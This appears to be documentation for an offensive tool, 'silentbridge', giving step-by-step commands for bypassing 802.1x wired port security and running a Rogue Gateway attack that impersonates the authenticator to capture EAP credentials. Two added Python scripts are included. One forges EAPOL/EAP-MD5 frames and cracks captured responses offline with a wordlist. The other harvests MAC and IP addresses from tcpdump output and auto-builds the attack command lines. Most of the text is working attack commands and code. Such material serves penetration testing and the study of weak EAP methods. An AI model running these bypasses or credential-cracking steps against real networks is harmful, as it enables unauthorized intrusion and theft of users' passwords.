Rogue Gateway Attack

Classic 802.1x Bypass
Effective against: 802.1x-2004, 802.1x-2001
The classic 802.1x bypass is by far the simplest to perform, and is effective against 802.1x-2004 and 802.1x-2001 without any of the extra hardware mojo described in LATERSECTION.
Begin by connecting your rogue device between the supplicant and the authenticator as described in LATERSECTION.
Then, connect to your device using your side channel (see: LATERSECTION).
If you are using Device Configuration B (see: LATERSECTION), make sure both splitters are in the "connect" position by running the --splitterctl command (skip this step if you are not using Device Configuration B):
./silentbridge --splitterctl --upstream-splitter connect --phy-splitter connect
Next, use the --create-bridge command to create a simple transparent bridge:
replace eno1, eno2, and eno3 with the names of your upstream, PHY, and sidechannel interfaces
./silentbridge --create-bridge --upstream eno1 --phy eno2 --sidechannel eno3
That's it - you've just bypassed port security. You should be able to sniff traffic traveling to and from the supplicant.
Now that we've performed our initial bypass, let's give ourselves the capability to interact with devices on the network.
First, use tcpdump on the bridge's interfaces to gather the following data points:
- MAC address of the default gateway (the destination MAC the supplicant uses for off-subnet traffic)
- IP address of the supplicant
- MAC address of the supplicant
- MAC address of the switch (the source MAC of the EAPOL frames the authenticator sends toward the supplicant)
Then, use the --add-interaction flag to add network interaction to your bridge:
replace the interface names, IPs, and MAC addresses below with the data gathered using tcpdump
./silentbridge --add-interaction --gw-mac d0:17:c2:3f:af:e0 --client-ip 192.168.1.81 --upstream eno1 --client-mac 38:60:32:d0:ef:0b --phy eno2 --switch-mac 00:42:5a:87:09:85 --sidechannel eno3
Congrats - you can now interact with anything on the network except the supplicant.
Rogue Gateway Attack
Effective against: 802.1x-2010 (Device Configuration B only), 802.1x-2004, 802.1x-2001
In a Rogue Gateway attack, the attacker impersonates the authenticator in order to force the supplicant to perform EAP authentication with the attacker. With a weak EAP method this hands the attacker a set of hashes (the EAP challenge/response pairs) that can be cracked offline to obtain plaintext credentials. Those credentials can then be used to authenticate to the network with the Bait n Switch attack, bypassing port security without using a bridge at all.
When used with Device Configuration B, the Rogue Gateway Attack can also bypass 802.1x-2010 in cases where weak EAP methods are used (note that this has not been tested against MACsec implemented with a pre-shared key).
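The exchange described above, as an added example that is not silentbridge's own code: a rogue authenticator sends EAP-Request/Identity and then an EAP-MD5 challenge over EAPOL, a (simulated) supplicant answers it the way a real EAP-MD5 peer would, and the attacker keeps the identifier, challenge and response and cracks them offline against a wordlist. EAP-MD5 (RFC 3748 section 5.4) stands in here for "weak EAP method"; the MAC addresses, identity, password and wordlist are constructed, and the supplicant side is simulated so the whole thing runs offline.

```python
"""Rogue-authenticator EAP-MD5 exchange over EAPOL and offline crack of the response.

Added example, not silentbridge code.  EAP-MD5 stands in for "weak EAP method";
MACs, identity, password and wordlist are constructed, the supplicant is simulated."""
import hashlib
import os
import struct

PAE_GROUP_MAC = bytes.fromhex("0180c2000003")   # 802.1X PAE group address
ETHERTYPE_EAPOL = 0x888E
EAPOL_EAP_PACKET = 0                            # EAPOL packet type "EAP-Packet"
EAP_REQUEST, EAP_RESPONSE = 1, 2
EAP_TYPE_IDENTITY, EAP_TYPE_MD5 = 1, 4
SUPPLICANT_MAC = bytes.fromhex("386032d0ef0b")  # constructed
ROGUE_MAC = bytes.fromhex("d017c23fafe0")       # constructed

def eap_packet(code, ident, eap_type, data):
    """EAP header (RFC 3748 s4.1): code, identifier, length, then type + type-data."""
    body = bytes([eap_type]) + data
    return struct.pack("!BBH", code, ident, 4 + len(body)) + body

def eapol_frame(src_mac, eap, dst_mac=PAE_GROUP_MAC):
    """Ethernet + EAPOL (version 2, type EAP-Packet) headers around an EAP packet."""
    eapol = struct.pack("!BBH", 2, EAPOL_EAP_PACKET, len(eap)) + eap
    return dst_mac + src_mac + struct.pack("!H", ETHERTYPE_EAPOL) + eapol

def parse_eapol(frame):
    """Return (src_mac, code, ident, eap_type, type_data) of an EAPOL EAP-Packet frame."""
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_EAPOL:
        raise ValueError("not an EAPOL frame")
    _version, ptype, elen = struct.unpack("!BBH", frame[14:18])
    if ptype != EAPOL_EAP_PACKET:
        raise ValueError("not an EAP-Packet")
    eap = frame[18:18 + elen]
    code, ident, length = struct.unpack("!BBH", eap[:4])
    return frame[6:12], code, ident, eap[4], eap[5:length]

def md5_response_value(ident, secret, challenge):
    """EAP-MD5 Response Value = MD5(identifier || secret || challenge)."""
    return hashlib.md5(bytes([ident]) + secret + challenge).digest()

# Rogue authenticator: an Identity request first, then the MD5 challenge.
def rogue_identity_request(ident):
    return eapol_frame(ROGUE_MAC, eap_packet(EAP_REQUEST, ident, EAP_TYPE_IDENTITY, b""))

def rogue_md5_challenge(ident, challenge):
    data = bytes([len(challenge)]) + challenge + b"rogue-gw"   # Value-Size, Value, Name
    return eapol_frame(ROGUE_MAC, eap_packet(EAP_REQUEST, ident, EAP_TYPE_MD5, data))

# Simulated supplicant: answers the challenge exactly as a real EAP-MD5 peer would.
def supplicant_md5_response(frame, identity, password):
    _src, code, ident, eap_type, data = parse_eapol(frame)
    if code != EAP_REQUEST or eap_type != EAP_TYPE_MD5:
        raise ValueError("expected an EAP-MD5 request")
    challenge = data[1:1 + data[0]]
    value = md5_response_value(ident, password, challenge)
    return eapol_frame(SUPPLICANT_MAC,
                       eap_packet(EAP_RESPONSE, ident, EAP_TYPE_MD5, bytes([16]) + value + identity))

# Attacker: keep (id, challenge, response, identity) from the two frames, then crack offline.
def capture_md5(challenge_frame, response_frame):
    _, _, ident, _, cdata = parse_eapol(challenge_frame)
    _, code, rid, rtype, rdata = parse_eapol(response_frame)
    if code != EAP_RESPONSE or rtype != EAP_TYPE_MD5 or rid != ident:
        raise ValueError("response does not match the challenge")
    vsize = rdata[0]
    return ident, cdata[1:1 + cdata[0]], rdata[1:1 + vsize], rdata[1 + vsize:]

def crack_md5(ident, challenge, response, wordlist):
    """Dictionary attack: one MD5 per candidate; the only 'salt' is the 1-byte id and the challenge."""
    return next((w for w in wordlist if md5_response_value(ident, w, challenge) == response), None)

def run_exchange(password=b"Winter2020!", wordlist=(b"password", b"Winter2020!", b"letmein")):
    """Drive the exchange; return (identity seen on the wire, cracked password or None)."""
    req = rogue_md5_challenge(8, os.urandom(16))      # Identity round-trip omitted for brevity
    resp = supplicant_md5_response(req, b"alice@corp.example", password)
    ident, chal, value, identity = capture_md5(req, resp)
    return identity, crack_md5(ident, chal, value, wordlist)

if __name__ == "__main__":
    print(run_exchange())
```

The point of the crack function is how cheap it is: the response is an unsalted MD5 over the identifier, the secret and a challenge the attacker chose, so one hash per candidate recovers the password, which is what makes a method like this "weak" in the sense used above. Methods with server certificate validation or mutual authentication do not hand over anything this crackable, which is why the attack's reach depends on the EAP method in use.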
Begin by connecting your rogue device between the supplicant and the authenticator as described in LATERSECTION.
Next, connect to your device using your side channel (see: LATERSECTION).
Then, follow the instruction set below that matches your device's configuration:
Device Configuration A
Begin by performing a classic 802.1x bypass as described in LATERSECTION.
Then, use tcpdump to passively sniff the following data points:
- supplicant MAC address
- switch MAC address
- subnet netmask (visible in a DHCP offer or ACK if the supplicant renews its lease while you are watching; otherwise infer it from the addresses in use)
- gateway IP
Then, use the --rogue-gateway command to perform the rogue gateway attack:
./silentbridge --rogue-gateway --upstream eno1 --client-mac 38:60:77:d0:ef:0b --phy eno2 --switch-mac 00:42:5a:87:57:85 --netmask 255.255.255.0 --gw-ip 192.168.1.1
When finished, hit CTRL+C to terminate the attack. Then use the --bridge-up command to restore the classic 802.1x bypass:
./silentbridge --bridge-up
Device Configuration B
Begin by using the --splitterctl command to make sure that both splitters are in the "bypass" position:
./silentbridge --splitterctl --upstream-splitter bypass --phy-splitter bypass
Next, use tcpdump to sniff traffic on the interfaces connected to the device's passive tap. Gather the following data points:
- supplicant MAC address
- switch MAC address
- subnet netmask
- gateway IP
Then, use the --rogue-gateway command to perform the rogue gateway attack:
./silentbridge --rogue-gateway --upstream eno1 --client-mac 38:60:77:d0:ef:0b --phy eno2 --switch-mac 00:42:5a:87:57:85 --netmask 255.255.255.0 --gw-ip 192.168.1.1 --use-splitters
When finished, hit CTRL+C to terminate the attack.
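Both the classic bypass and the rogue gateway steps above tell you to pull the same handful of addresses out of tcpdump by hand. The following is an added example, not part of silentbridge, that automates that: it reads `tcpdump -e -n` style lines, infers the supplicant, switch and gateway MACs, the supplicant IP, and (when a DHCP lease decoded with `-v` happens to be in the capture) the netmask and gateway IP, and then assembles the `--add-interaction` and `--rogue-gateway` command lines from the flags shown on this page. The heuristics are assumptions, stated in the comments: the authenticator and the supplicant are the only EAPOL senders, only the supplicant also sends ARP/IPv4, and the gateway is whatever MAC the supplicant addresses its off-subnet traffic to. The sample capture is constructed and only approximates tcpdump's formatting; VLAN-tagged frames are skipped.

```python
"""Harvest the addresses silentbridge's --add-interaction and --rogue-gateway flags need
from `tcpdump -e -n` output (DHCP options only appear with -v).

Added example, not silentbridge code.  The sample capture is constructed."""
import ipaddress
import re
from collections import Counter

MAC = r"[0-9a-f]{2}(?::[0-9a-f]{2}){5}"
IP4 = r"\d{1,3}(?:\.\d{1,3}){3}"
ETH_RE = re.compile(rf"^\S+ (?P<src>{MAC}) > (?P<dst>{MAC}), ethertype (?P<type>\w+) "
                    rf"\(0x[0-9a-f]+\), length \d+: (?P<rest>.*)$")   # 802.1Q lines don't match, skipped
IP_RE = re.compile(rf"^(?P<sip>{IP4})(?:\.\d+)? > (?P<dip>{IP4})(?:\.\d+)?:")
ARP_REQ_RE = re.compile(rf"Request who-has {IP4} tell (?P<sender>{IP4})")
ARP_REP_RE = re.compile(rf"Reply (?P<ip>{IP4}) is-at (?P<mac>{MAC})")
# tcpdump's DHCP option wording differs between versions, so match loosely on the name.
MASK_RE = re.compile(rf"Subnet-Mask[^:]*:\s*(?P<mask>{IP4})")
ROUTER_RE = re.compile(rf"Default-Gateway[^:]*:\s*(?P<ip>{IP4})")

def harvest(lines):
    """Infer supplicant/switch/gateway addressing from tcpdump lines (heuristic, see comments)."""
    eapol_src, data_src = Counter(), Counter()   # who sends EAPOL; who sends ARP/IPv4
    claimed_ip = {}      # MAC -> Counter of IPv4 addresses it uses as a source
    arp_table = {}       # IP -> MAC learned from ARP replies
    ip_frames = []       # (src_mac, dst_mac, dst_ip) for unicast IPv4 frames
    netmask = gw_ip = None
    for line in lines:
        if m := MASK_RE.search(line):
            netmask = m["mask"]
        if m := ROUTER_RE.search(line):
            gw_ip = m["ip"]
        e = ETH_RE.match(line.strip())
        if not e:
            continue
        src, dst, rest = e["src"], e["dst"], e["rest"]
        if e["type"] == "EAPOL":
            eapol_src[src] += 1
        elif e["type"] == "ARP":
            data_src[src] += 1
            if m := ARP_REQ_RE.search(rest):
                claimed_ip.setdefault(src, Counter())[m["sender"]] += 1
            if m := ARP_REP_RE.search(rest):
                arp_table[m["ip"]] = m["mac"]
                claimed_ip.setdefault(src, Counter())[m["ip"]] += 1
        elif e["type"] == "IPv4" and (m := IP_RE.match(rest)):
            data_src[src] += 1
            claimed_ip.setdefault(src, Counter())[m["sip"]] += 1
            if not dst.startswith(("ff:ff", "01:00:5e")):   # ignore broadcast/multicast
                ip_frames.append((src, dst, m["dip"]))
    # Supplicant: sends EAPOL *and* data.  Switch: the other EAPOL sender.
    client_mac = next((m for m, _ in eapol_src.most_common() if m in data_src), None)
    switch_mac = next((m for m, _ in eapol_src.most_common() if m != client_mac), None)
    ips = claimed_ip.get(client_mac, Counter()).most_common(1)
    client_ip = ips[0][0] if ips else None
    # Gateway: where the supplicant sends off-subnet traffic (all unicast if netmask unknown).
    net = ipaddress.ip_network(f"{client_ip}/{netmask}", strict=False) if client_ip and netmask else None
    off_link = Counter(dmac for smac, dmac, dip in ip_frames
                       if smac == client_mac and (net is None or ipaddress.ip_address(dip) not in net))
    gw_mac = off_link.most_common(1)[0][0] if off_link else None
    if gw_ip is None and gw_mac:   # no DHCP decode seen: reverse-lookup the ARP table
        gw_ip = next((ip for ip, mac in arp_table.items() if mac == gw_mac), None)
    return {"client_mac": client_mac, "client_ip": client_ip, "switch_mac": switch_mac,
            "gw_mac": gw_mac, "gw_ip": gw_ip, "netmask": netmask}

def add_interaction_argv(p, upstream, phy, sidechannel):
    """argv for the --add-interaction step of the classic bypass."""
    return ["./silentbridge", "--add-interaction", "--gw-mac", p["gw_mac"],
            "--client-ip", p["client_ip"], "--upstream", upstream, "--client-mac", p["client_mac"],
            "--phy", phy, "--switch-mac", p["switch_mac"], "--sidechannel", sidechannel]

def rogue_gateway_argv(p, upstream, phy, use_splitters=False):
    """argv for the --rogue-gateway step; --use-splitters for Device Configuration B."""
    if p["netmask"] is None or p["gw_ip"] is None:
        raise ValueError("netmask/gateway IP not observed on the wire; supply them by hand")
    argv = ["./silentbridge", "--rogue-gateway", "--upstream", upstream,
            "--client-mac", p["client_mac"], "--phy", phy, "--switch-mac", p["switch_mac"],
            "--netmask", p["netmask"], "--gw-ip", p["gw_ip"]]
    return argv + ["--use-splitters"] if use_splitters else argv

# Constructed sample in the shape of `tcpdump -e -n -v` output (not a real capture).
SAMPLE = """\
10:00:00.000001 00:42:5a:87:09:85 > 01:80:c2:00:00:03, ethertype EAPOL (0x888e), length 60: EAP packet (0) v2, len 5
10:00:00.000200 38:60:32:d0:ef:0b > 01:80:c2:00:00:03, ethertype EAPOL (0x888e), length 60: EAP packet (0) v1, len 10
10:00:00.000400 00:42:5a:87:09:85 > 01:80:c2:00:00:03, ethertype EAPOL (0x888e), length 60: EAP packet (0) v2, len 4
10:00:01.000000 d0:17:c2:3f:af:e0 > 38:60:32:d0:ef:0b, ethertype IPv4 (0x0800), length 342: 192.168.1.1.67 > 192.168.1.81.68: BOOTP/DHCP, Reply, length 300
        Subnet-Mask Option 1, length 4: 255.255.255.0
        Default-Gateway Option 3, length 4: 192.168.1.1
10:00:02.000000 38:60:32:d0:ef:0b > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.1.1 tell 192.168.1.81, length 28
10:00:02.000300 d0:17:c2:3f:af:e0 > 38:60:32:d0:ef:0b, ethertype ARP (0x0806), length 60: Reply 192.168.1.1 is-at d0:17:c2:3f:af:e0, length 46
10:00:03.000000 38:60:32:d0:ef:0b > d0:17:c2:3f:af:e0, ethertype IPv4 (0x0800), length 74: 192.168.1.81.51234 > 8.8.8.8.53: 1234+ A? example.com. (29)
10:00:03.010000 38:60:32:d0:ef:0b > 38:60:32:d0:ef:99, ethertype IPv4 (0x0800), length 98: 192.168.1.81 > 192.168.1.50: ICMP echo request, id 1, seq 1, length 64
"""

if __name__ == "__main__":
    params = harvest(SAMPLE.splitlines())
    print(params)
    print(" ".join(rogue_gateway_argv(params, "eno1", "eno2", use_splitters=True)))
```

Feed it a real capture with `tcpdump -e -n -v -i <iface> -l | python3 harvest.py` style piping, or a saved file; when no DHCP exchange is seen the netmask stays unknown, the gateway MAC is picked from all of the supplicant's unicast traffic, and `rogue_gateway_argv` refuses to build a command rather than guessing a netmask for you.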